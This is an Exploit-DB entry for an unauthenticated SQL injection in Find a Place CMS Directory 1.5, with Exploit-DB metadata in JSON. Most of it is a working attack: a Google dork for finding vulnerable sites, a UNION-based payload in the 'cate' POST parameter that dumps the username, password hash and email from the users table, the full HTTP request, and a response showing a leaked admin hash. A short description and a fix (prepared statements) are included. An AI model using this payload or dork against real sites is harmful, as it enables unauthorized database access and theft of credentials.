ID EDB-ID:46418
Type exploitdb
Reporter Exploit-DB
Modified 2019-02-19T00:00:00
Description
# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection
# Google Dork: inurl:"assets/external/data.php"  (note: the dork targets data.php, while the vulnerable endpoint documented below is the sibling file data_2.php in the same directory)
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://themerig.com/
# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597
# Demo Website: https://themerig.com/find/
# Version: 1.5
# Tested on: WIN7_x86/Linux
# CVE : N/A
# Description:
----------------------
Find a Place CMS Directory 1.5 suffers from an unauthenticated SQL Injection vulnerability: the `cate` POST parameter of assets/external/data_2.php is placed into a SQL query without sanitization or parameterization. The injection point sits inside a single-quoted value wrapped in parentheses (hence the `')` prefix in the payload), the original query selects 32 columns, and the 19th column is echoed back in the `featured` field of the JSON response, so content of arbitrary tables (here `users`) can be read directly. The request below carries no session cookie and the server answers by issuing a fresh PHPSESSID, so no authentication is required to reach the endpoint. Remediation: pass `cate` to the database as a bound parameter of a prepared statement (PDO or mysqli) and validate it against the expected type. The 32-hex-character password value in the response looks like an unsalted MD5 digest (not confirmed from this page alone); any deployment that was reachable should treat stored credentials as compromised and review the password hashing scheme.
# POC:
----------------------
1. Access the following path https://[PATH]/assets/external/data_2.php
2. Send a POST request whose body contains the payload below. The payload closes the original quoted, parenthesised value with `')`, appends a UNION ALL SELECT with 32 columns to match the original query, places `concat(username,0x3a3a,password,0x3a3a,email)` in the 19th column (the one rendered in the `featured` JSON field), reads one row from the `users` table via `limit 1`, and comments out the rest of the original query with `-- -`. The `0x3a3a` literals render as `::` separators, as seen in the response. The Content-Length of 251 in the sample request corresponds to the unencoded payload; if your client URL-encodes form bodies, the length will differ but the injection is unaffected.
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Request:
----------------------
POST /find/assets/external/data_2.php HTTP/1.1
Host: server
Connection: close
Content-Length: 251
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://themerig.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://server/find/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -
# Response:
----------------------
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.40
Set-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 227
Vary: Accept-Encoding
Date: Fri, 15 Feb 2019 03:09:26 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Alt-Svc: quic=":443"; ma=2592000; v="35,39,43"
Connection: close
{"data":[{"id":null,"category":null,"title":null,"address":null,"latitude":null,"longitude":null,"marker_color":null,"feaured":null,"marker_image":[""],"featured":"admin::4db50f86732e926e59d306cff063d568::themerig@server"}]}
{"id": "EDB-ID:46418", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection", "description": "", "published": "2019-02-19T00:00:00", "modified": "2019-02-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/46418", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2019-02-19T17:45:07", "viewCount": 27, "enchantments": {"dependencies": {"references": [], "modified": "2019-02-19T17:45:07", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2019-02-19T17:45:07", "rev": 2}, "vulnersScore": 0.4}, "sourceHref": "https://www.exploit-db.com/download/46418", "sourceData": "# Exploit Title: Find a Place CMS Directory 1.5 - 'assets/external/data_2.php cate' SQL Injection\r\n# Google Dork: inurl:\"assets/external/data.php\"\r\n# Date: 14 Feb 2019\r\n# Exploit Author: Deyaa Muhammad\r\n# Author EMail: contact [at] deyaa.me\r\n# Author Blog: http://deyaa.me\r\n# Vendor Homepage: https://themerig.com/\r\n# Software Link: https://codecanyon.net/item/locations-multipurpose-cms-directory-theme/21098597\r\n# Demo Website: https://themerig.com/find/\r\n# Version: 1.5\r\n# Tested on: WIN7_x68/Linux\r\n# CVE : N/A\r\n\r\n# Description:\r\n----------------------\r\nFind a Place CMS Directory 1.5 suffers from a SQL Injection vulnerability.\r\n\r\n# POC:\r\n----------------------\r\n1. Access the following path https://[PATH]/assets/external/data_2.php\r\n2. 
You can perform a \"Generic UNION query\" and extract admin credentials by sending a \"POST\" request using the payload below\r\ncate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -\r\n\r\n# Request:\r\n----------------------\r\nPOST /find/assets/external/data_2.php HTTP/1.1\r\nHost: server\r\nConnection: close\r\nContent-Length: 251\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nOrigin: https://themerig.com\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nReferer: https://server/find/index.php\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\ncate=2.9') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat(username,0x3a3a,password,0x3a3a,email),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users limit 1-- -\r\n\r\n\r\n# Response:\r\n----------------------\r\nHTTP/1.1 200 OK\r\nX-Powered-By: PHP/5.6.40\r\nSet-Cookie: PHPSESSID=1sml2ou7o5e379b05l3q0iscq1; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 227\r\nVary: Accept-Encoding\r\nDate: Fri, 15 Feb 2019 03:09:26 GMT\r\nAccept-Ranges: bytes\r\nServer: LiteSpeed\r\nAlt-Svc: quic=\":443\"; ma=2592000; v=\"35,39,43\"\r\nConnection: 
close\r\n\r\n{\"data\":[{\"id\":null,\"category\":null,\"title\":null,\"address\":null,\"latitude\":null,\"longitude\":null,\"marker_color\":null,\"feaured\":null,\"marker_image\":[\"\"],\"featured\":\"admin::4db50f86732e926e59d306cff063d568::themerig@server\"}]}", "osvdbidlist": [], "immutableFields": []}
{}